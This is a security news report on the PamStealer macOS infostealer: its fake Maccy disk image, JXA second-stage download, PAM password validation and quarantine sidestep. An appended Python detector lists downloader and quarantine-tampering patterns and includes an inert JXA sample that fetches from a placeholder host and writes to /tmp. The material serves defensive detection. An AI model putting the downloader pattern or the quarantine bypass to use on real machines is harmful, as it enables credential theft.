New macOS Malware 'PamStealer' Uses Clever Techniques to Steal Passwords Stealthily
Researchers have discovered a novel macOS malware that combines multiple clever tactics to infect Macs and steal login passwords, staying hidden by masquerading as legitimate apps and delaying suspicious prompts.

Researchers at security firm Jamf have discovered a new macOS malware named PamStealer. It is delivered in two stages. The first stage is a disk image masquerading as Maccy, a legitimate clipboard manager. The disk image contains an AppleScript that opens in Script Editor when double-clicked, with the malicious code buried deep within the file. Instead of typical shell commands, the AppleScript uses JavaScript for Automation (JXA) to download the second stage through native Objective-C APIs.

The second stage is an infostealer written in Rust. It uses the Pluggable Authentication Modules (PAM) interface built into macOS to validate the user's login password locally before sending it to an attacker-controlled server.

PamStealer employs several stealth techniques. It sidesteps the com.apple.quarantine attribute by prompting the user to press Command-R immediately after double-clicking, which executes the malicious code without triggering quarantine warnings. The second stage masquerades as legitimate system components such as Finder or Software Update, using genuine Finder icons. It also encrypts command-and-control traffic and delays prompts such as Full Disk Access requests for up to 40 minutes to avoid detection.

Together, these techniques make PamStealer quieter than typical macOS stealers. The malware shows how commodity macOS stealers are evolving toward native implementations and less detectable execution chains.
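The first-stage pattern described above (a JXA script reaching native Objective-C APIs to fetch and stage a payload) can be triaged with a simple indicator scan. The following is an added example for defenders, not code from Jamf's report or from the malware; the indicator strings are assumptions about typical ObjC-bridge usage in JXA, not indicators extracted from the PamStealer sample, and the sample scripts are constructed and inert.

```python
# Heuristic triage of AppleScript / JXA text for a staged-downloader chain.
# Indicator patterns are assumptions (common ObjC-bridge calls), not sample IoCs.
import re
from typing import Dict, List

INDICATORS: Dict[str, List[str]] = {
    "objc_bridge": [r"ObjC\.import\s*\(", r"\$\.NS[A-Z]\w+"],
    "network_fetch": [r"NSURLSession", r"dataWithContentsOfURL", r"NSMutableURLRequest"],
    "write_to_disk": [r"writeToFile", r"createFileAtPath", r"NSFileManager"],
    "execution": [r"NSTask", r"doShellScript", r"do shell script"],
    "quarantine_tamper": [r"com\.apple\.quarantine", r"xattr"],
}

def match_indicators(script_text: str) -> Dict[str, List[str]]:
    """Return the indicator groups present in the script and the patterns that hit."""
    hits: Dict[str, List[str]] = {}
    for group, patterns in INDICATORS.items():
        found = [p for p in patterns if re.search(p, script_text)]
        if found:
            hits[group] = found
    return hits

def classify(script_text: str) -> str:
    """Flag scripts that combine the ObjC bridge, a network fetch and a write or exec step."""
    hits = match_indicators(script_text)
    dropper_chain = ("objc_bridge" in hits and "network_fetch" in hits
                     and ("write_to_disk" in hits or "execution" in hits))
    if dropper_chain:
        return "suspicious: jxa-downloader-chain"
    if hits:
        return "review: " + ",".join(sorted(hits))  # partial match, needs an analyst
    return "clean"

# Constructed samples for demonstration (inert; placeholder URL and path).
BENIGN_JXA = ('var app = Application.currentApplication();\n'
              'app.includeStandardAdditions = true;\napp.displayDialog("Hello");\n')
BRIDGE_ONLY_JXA = ('ObjC.import("Foundation");\n'
                   'var prefs = $.NSUserDefaults.standardUserDefaults;\n')
SUSPICIOUS_JXA = ('ObjC.import("Foundation");\n'
                  'var url = $.NSURL.URLWithString("https://stage2.example.invalid/...");\n'
                  'var data = $.NSData.dataWithContentsOfURL(url);\n'
                  'data.writeToFileAtomically("/tmp/...", true);\n')

if __name__ == "__main__":
    for name, text in [("benign", BENIGN_JXA), ("bridge-only", BRIDGE_ONLY_JXA),
                       ("suspicious", SUSPICIOUS_JXA)]:
        print(f"{name}: {classify(text)}")
```

Run it over scripts extracted from a mounted disk image before anyone opens them in Script Editor; a "review" verdict is a prompt for manual inspection, not a conviction.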


